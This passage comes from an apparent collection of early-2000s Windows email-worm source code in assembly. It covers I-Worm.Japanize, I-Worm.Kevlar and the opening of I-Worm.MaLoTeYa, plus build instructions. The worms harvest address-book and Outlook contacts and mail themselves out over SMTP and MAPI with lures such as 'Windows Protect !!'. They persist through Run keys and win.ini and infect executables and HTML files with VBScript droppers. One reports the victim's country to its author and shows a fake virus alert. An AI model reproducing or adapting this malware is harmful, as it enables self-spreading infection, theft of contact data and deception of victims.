js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; 重要なお知らせ
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re:重要なおしらせ
js_05 db 'GyRCTmMkTjdvGyhC',0 ; 例の件
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re:例の件
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; お久しぶりです
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re:お久しぶりです
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; こんにちは
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re:こんにちは
js_11 db 'GyRCNktIaxsoQg==',0 ; 極秘
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re:極秘
js_13 db 'GyRCO3FOQRsoQg==',0 ; 資料
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re:資料
js_15 db 'GyRCMz8bKEI=',0 ; ウソコ
js_16 db 'GyRCJSYlYxsoQlI=',0 ; ウソコ
js_17 db 'GyRCJCYkcyQzGyhC',0 ; うんこ
.code
start:
callW GetTickCount
mov dwo [r_seed],eax
jmp @@go
;; signature :)
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
db 'XXXXX I-Worm.Japanize XXXXX',0
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
@@go:
call get_some_info
push ofs buffer
push 0101h
callW WSAStartup
test eax,eax
jnz exit
call open_wab
test eax,eax
jnz clean_sock
call create_base64enc
call spread
free_mem:
push dwo [ptr_base64buf]
callW GlobalUnlock
push dwo [hmemout]
callW GlobalFree
close_wab4:
push dwo [hwab4file]
push dwo [hwab4map]
push dwo [hwab4mapview]
callW CloseHandle
callW CloseHandle
callW CloseHandle
clean_sock:
callW WSACleanup
exit:
push 0
callW ExitProcess
spread:
;; lifewire ;)
mov esi,dwo [hwab4mapview]
mov ecx,[esi+64h] ; num of addr
jecxz @@exit
add esi,[esi+60h] ; ptr to addr
@@spread_loop:
push ecx
mov eax,esi
cmp by [esi+1],0
jne @@nounicode
push esi
lea edi,target_mailaddr
push edi
push 48h
pop ecx
@@1:
lodsw
stosb
loop @@1
pop eax
pop esi
add esi,20h
@@nounicode:
call spread2
add esi,24h
pop ecx
loop @@spread_loop
@@exit:
ret
spread2:
push esi
mov esi,eax ; now esi=email addr
push 0
push 1
push 2
callW socket
mov dwo [sock],eax
mov wo [sin_family],AF_INET
mov ax,25
xchg al,ah
mov wo [sin_port],ax
push ofs SMTP_Server
callW gethostbyname
test eax,eax
jz @@exit
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov dwo [sin_addr],eax
push len_sockaddr_in
lea eax,sockaddr_in
push eax
push dwo [sock]
callW connect
test eax,eax
jnz @@exit
call sendmail
@@exit:
pop esi
ret
;;; ---
;;; reg stuff
get_some_info:
xor ebx,ebx
push ofs hReg
push 1
push ebx
push ofs str_SMInternetAccountManager
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_accountidx
push ofs AccountIdx
push ebx
push ebx
push ofs str_DMA
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMIAccounts
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_SMTPSERVER
push ofs SMTP_Server
push ebx
push ebx
push ofs str_SMTPNAME
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push ofs bufsiz_morons_mailaddr
push ofs morons_Mailaddr
push ebx
push ebx
push ofs str_SMTPEmailAddr
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
push ofs hReg
push 1
push ebx
push ofs str_SMWab4
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error
push ofs bufsiz_wab4_path
push ofs wab4_path
push ebx
push ebx
push ebx
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error
push dwo [hReg]
callW RegCloseKey
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
open_wab:
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_WRITE
push GENERIC_READ
push ofs wab4_path
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hwab4file],eax
push ebx
push ebx
push ebx
push PAGE_READONLY
push ebx
push eax
callW CreateFileMappingA
mov dwo [hwab4map],eax
push ebx
push ebx
push ebx
push FILE_MAP_READ
push eax
callW MapViewOfFile
mov dwo [hwab4mapview],eax
xor eax,eax
ret
@@error:
xor eax,eax
dec eax
ret
create_base64enc:
push 260
push ofs myfilename
push 0
callW GetModuleFileNameA
xor ebx,ebx
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push ofs myfilename
callW CreateFileA
inc eax
jz @@error
dec eax
mov dwo [hmyfile],eax
push 0
push dwo [hmyfile]
callW GetFileSize
mov dwo [fsize],eax
add eax,100h
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout0],eax
push eax
callW GlobalLock
mov dwo [ptr_myself],eax
push 0
push ofs recv_buffer
push dwo [fsize]
push eax
push dwo [hmyfile]
callW ReadFile
test eax,eax
jz @@eexit
push 0
push dwo [hmyfile]
callW GetFileSize
push eax ; save size
shl eax,1 ; eax*2
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout],eax
push eax
callW GlobalLock
mov dwo [ptr_base64buf],eax
; pop ebx ; restore size
; push ebx ; size
push eax
push dwo [ptr_myself]
call base64encode
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
xor eax,eax
ret
@@eexit:
push dwo [hmyfile]
callW CloseHandle
push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree
@@error:
xor eax,eax
dec eax
ret
base64encode proc pascal
arg @@src
arg @@dest
arg @@srclen
mov esi,dwo [@@src]
mov edi,dwo [@@dest]
@@b64loop:
xor eax,eax
cmp dwo [@@srclen],1
jne @@srclen2
lodsb
push 2
pop ecx
mov edx,03D3Dh ; ==
dec dwo [@@srclen]
jmp @@b64next
@@srclen2:
cmp dwo [@@srclen],2
jne @@srclen3
lodsw
push 3
pop ecx
push 03dh
pop edx
sub dwo [@@srclen],2
jmp @@b64next
@@srclen3:
lodsd
push 4
pop ecx
xor edx,edx
dec esi
sub dwo [@@srclen],3
@@b64next:
bswap eax
@@b64n_loop:
mov ebx,eax
and eax,0FC000000h
rol eax,6
mov al,[@@b64table + eax]
stosb
mov eax,ebx
shl eax,6
dec ecx
jnz @@b64n_loop
cmp dwo [@@srclen],0
ja @@b64loop
mov eax,edx
stosd
ret
@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
endp
g_send:
;; in
;; ecx = size
;; esi = ptr to data
;; out
;; eax = ret value of send()
push 0
push ecx
push esi
push dwo [sock]
callW send
ret
g_recv:
;; out
;; error -> eax=-1 success -> eax = 0
@@again:
push 0
push 1024
push ofs recv_buffer
push dwo [sock]
callW recv
inc eax
jz @@recv_error
cmp eax,1024
jz @@again
xor eax,eax
ret
@@recv_error:
xor eax,eax
dec eax
ret
sendmail:
;; yea. lame routine ;)
push esi ; mail addr
mov dwo [jflag],0 ; flag for .jp
;;
call g_recv
;;
lea esi,smtp_HELO
mov ecx,len_smtp_HELO
call g_send
call g_recv
;;
lea esi,smtp_MAIL_FROM
mov ecx,len_smtp_MAIL_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;;
mov ecx,len_smtp_RCPT_TO
lea esi,smtp_RCPT_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
push eax ; save
mov ecx,eax
call g_send
mov ecx,2
lea esi,smtp_crlf
call g_send
call g_recv
;; .jp?
pop eax ; len of mail address
pop esi
push esi ; mail address
add esi,eax
sub esi,3
cmp dwo [esi],00706a2eh ; .jp?
jne @@1
inc dwo [jflag]
@@1:
;;
lea esi,smtp_DATA
mov ecx,len_smtp_DATA
call g_send
call g_recv
;;
lea esi,smtp_BODY_FROM
mov ecx,len_smtp_BODY_FROM
call g_send
push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send
lea esi,smtp_BODY_TO
mov ecx,len_smtp_BODY_TO
call g_send
pop esi
push esi
push esi
callW lstrlen
mov ecx,eax
call g_send
cmp dwo [jflag],0
jnz @@jsubject
mov ecx,len_smtp_BODY_SUBJECT
lea esi,smtp_BODY_SUBJECT
call g_send
jmp @@body
@@jsubject:
;; gen subject
mov ecx,len_smtp_jsubject_1
lea esi,smtp_jsubject_1
call g_send
mov esi,(num_of_jsub-1)
call rng
lea esi,japanese_subjects
mov esi,dwo [esi+eax*4]
push esi
callW lstrlen
mov ecx,eax
call g_send
mov ecx,len_smtp_jsubject_2
lea esi,smtp_jsubject_2
call g_send
@@body:
lea esi,smtp_MIME_h
mov ecx,len_smtp_MIME_h
call g_send
mov esi,dwo [ptr_base64buf]
push esi
push esi
callW lstrlen
pop esi
mov ecx,eax
call g_send
lea esi,smtp_MIME_e
mov ecx,len_smtp_MIME_e
call g_send
mov ecx,len_smtp_DOT_CRLF
lea esi,smtp_DOT_CRLF
call g_send
call g_recv
;;
mov ecx,len_smtp_QUIT
lea esi,smtp_QUIT
call g_send
call g_recv
pop esi
ret
rng:
;; in
;; esi = range
;; out
;; eax = random number
rdtsc
xor eax,edx
imul eax,dwo [r_seed]
dec eax
mov dwo [r_seed],eax
xor edx,edx
div esi
mov eax,edx
ret
end start
*************************************************************************
@ECHO OFF
TASM32 /ml /m /z japanize.asm,japanize.obj
TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
DEL *.OBJ

651
Win32/I-Worm.Kevlar.asm Normal file

@ -0,0 +1,651 @@
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th 2001 - August 16th 2001
Size : 5120 byte
Action : Copy itself to %System%\Kevlar32.exe hidden attribute
%System%\MScfg32.exe normal attribute
Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
* Infect %Windir%\C???????.exe file on writing as "PetiK" in the file
* Infect %Windir%\*.exe It add .htm and create a new file with ActiveX
* Create C:\__.vbs This filetake all address in th e Address Book at save them in the
%windir%\AddBook.txt. The worm scan this file to find the address and send a new mail :
Subject : Windows Protect !!
Body : The smallest software to stop your computer to bug in each time.
I have found this program on WWW.KEVLAR-PROTECT.COM
Take a look at the attchment.
Bye and have a nice day.
Attachment : MScfg32.exe
* It creates the %windir%\MSinfo32.txt. I look like this :
[File Infected] => Name of C???????.exe file infected
CLEANMGR.EXE=Infected by W32.Kevlar.PetiK
CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK
[EMail saved] => Some address found in the address book
first@mail.com=Next victim
second@mail.com=Next victim
To build the worm:
tasm32 /M /ML Kevlar
tlink32 -Tpe -aa -x Kevlar,,,import32
upx -9 Kevlar.exe
To delete the worm:
@echo off
del %windir%\system\Kevlar32.exe
del %windir%\system\MScfg32.exe
del %windir%\*.exe.htm
del %windir%\MSinfo32.txt
del %windir%\AddBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
callx GetModuleFileNameA
mov edi,offset CopyName2
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,'cSM\'
stosd
mov eax,'23gf'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
mov edi,offset CopyName
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov al,'\'
stosb
mov eax,'lveK'
stosd
mov eax,'23ra'
stosd
mov eax,'exe.'
stosd
pop edi
push esi
callx GetFileAttributesA
cmp eax,1
je SUITE
push 0
push edi
push esi
callx CopyFileA
push 01h
push edi
callx SetFileAttributesA
REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
@pushsz "SHSetValueA"
push edi
callx GetProcAddress
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad
call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA
call Infect
jmp FIN
SUITE: call Infect2
VB_F: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\__.vbs"
callx CreateFileA
test eax,eax
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\__.vbs"
callx WinExec
push 10000
callx Sleep
@pushsz "C:\__.vbs"
callx DeleteFileA
SCAN1: mov edi,offset addbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"ddA\"
stosd
mov eax,"kooB"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call OPEN
FIN: push 00h
callx ExitProcess
Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP
Infect Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF:
push offset Search
@pushsz "C???????.exe"
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset Search.cFileName
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
jz CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
callx UnmapViewOfFile
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle
cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
push offset Search.cFileName
@pushsz "File Infected"
callx WritePrivateProfileStringA
FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP
Infect2 Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF2:
push offset Search
@pushsz "*.exe"
callx FindFirstFileA
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset Search.cFileName
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP
OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??
call SCAN
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
NO: popad
ret
SCAN:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
callx GetWindowsDirectoryA
@pushsz "\MSinfo32.txt"
push offset save_addr
callx lstrcat
push offset save_addr
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?
; ===== MAIL =====
addbook db 50 dup (0)
save_addr db 50 dup (0)
m_addr db 128 dup (?)
MAPIHdl dd 0
subject db "Windows Protect !!",00h
body db "The smallest software to stop your computer to bug in each time.",0dh,0ah
db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah
db "Take a look at the attchment.",0dh,0ah,0dh,0ah
db 09h,09h,"Bye and have a nice day.",00h
NameFrom db "Your friend",00h
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?
htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>
end DEBUT
end

2048
Win32/I-Worm.M4&VR.asm Normal file

File diff suppressed because it is too large Load Diff

754
Win32/I-Worm.MaLoTeYa.asm Normal file

@ -0,0 +1,754 @@
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the
run= line and creates the VARegistered.htm file in the StartUp folder. This file send some
informations to petik@multimania.com and displays a fake message.
If the version of the platform is Windows 95/98, the file is a service process.
It infects all *.htm and *.html file while writing at the end a VB script. It checks after
if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files"
to find some EMail addreses and send a copy of itself. The worms sends equally an email to
"petik@multimania.com" with the country of the user. When the user want to see the
system properties, the title of the window is changed by "PetiK always is with you :-)".
Greets to Benny, ZeMacroKiller98, Mandragore.
tasm32 /M /ML Maloteya
tlink32 -Tpe -aa -x Maloteya,,,import32
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz CACHE
COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopb
push offset szOrig
callx CopyFileA
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
HTM: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset StartUp
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
F_HTM: push [SHELLhdl]
callx FreeLibrary
F_MESS: push 1000
callx Sleep
push 1040h
@pushsz "Microsoft Virus Alert"
@pushsz "Your system does not appear infected with I-Worm.Magistr"
push 00h
callx MessageBoxA
jmp FIN
;----------------------------------
;Serivice process for Windows 95/98
;----------------------------------
CACHE: @pushsz "KERNEL32.dll"
callx GetModuleHandleA
@pushsz "RegisterServiceProcess"
push eax
callx GetProcAddress
xchg ecx,eax
jecxz D_INF
push 01h
push 00h
call ecx
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: call infect ; and infect them
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
F_INF:
;-----------------------
; Check if we r conected
;-----------------------
NET1: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetGetConnectedState"
push WNEThdl
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET2
NET2: push 00h
push offset Temp
call [netcheck] ; Connect to Internet ??
dec eax
jnz NET2
FINNET: push [WNEThdl]
callx FreeLibrary
PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
push 00h ; Create Socket
push 01h ; SOCK_STREAM
push 02h ; AF_INET
callx socket
mov work_socket,eax
inc eax
jz FREE_WIN
push 16 ; Sze of connect strucure
call @1 ; Connect structure
dw 2 ; Family
db 0, 25 ; Port number
ServIP dd 0 ; IP of server
db 8 dup(0) ; Unused
@1:
push [work_socket]
callx connect
inc eax
jz CLOSE_SOC
lea esi,Send_M
mov bl,6
Command_Loop: xor eax,eax
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
push ecx ; Send command and data to the socket
push 00h
push ecx ; Size of buffer
push eax ; Buffer
push [work_socket]
callx send
pop ecx
cmp eax,ecx
jne CLOSE_SOC
dec ebx
jns Command_Loop
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
INIT: @pushsz "MAPI32.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov MAPIhdl,eax
@pushsz "MAPISendMail"
push MAPIhdl
callx GetProcAddress
test eax,eax
jz FIN
mov sendmail,eax
D_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 20h ; MSIE Cache Folder
push offset Cache
push 00h
call [getfolder]
push [SHELLhdl]
callx FreeLibrary
push offset Cache
callx SetCurrentDirectoryA
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
i_htm: call infect2
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
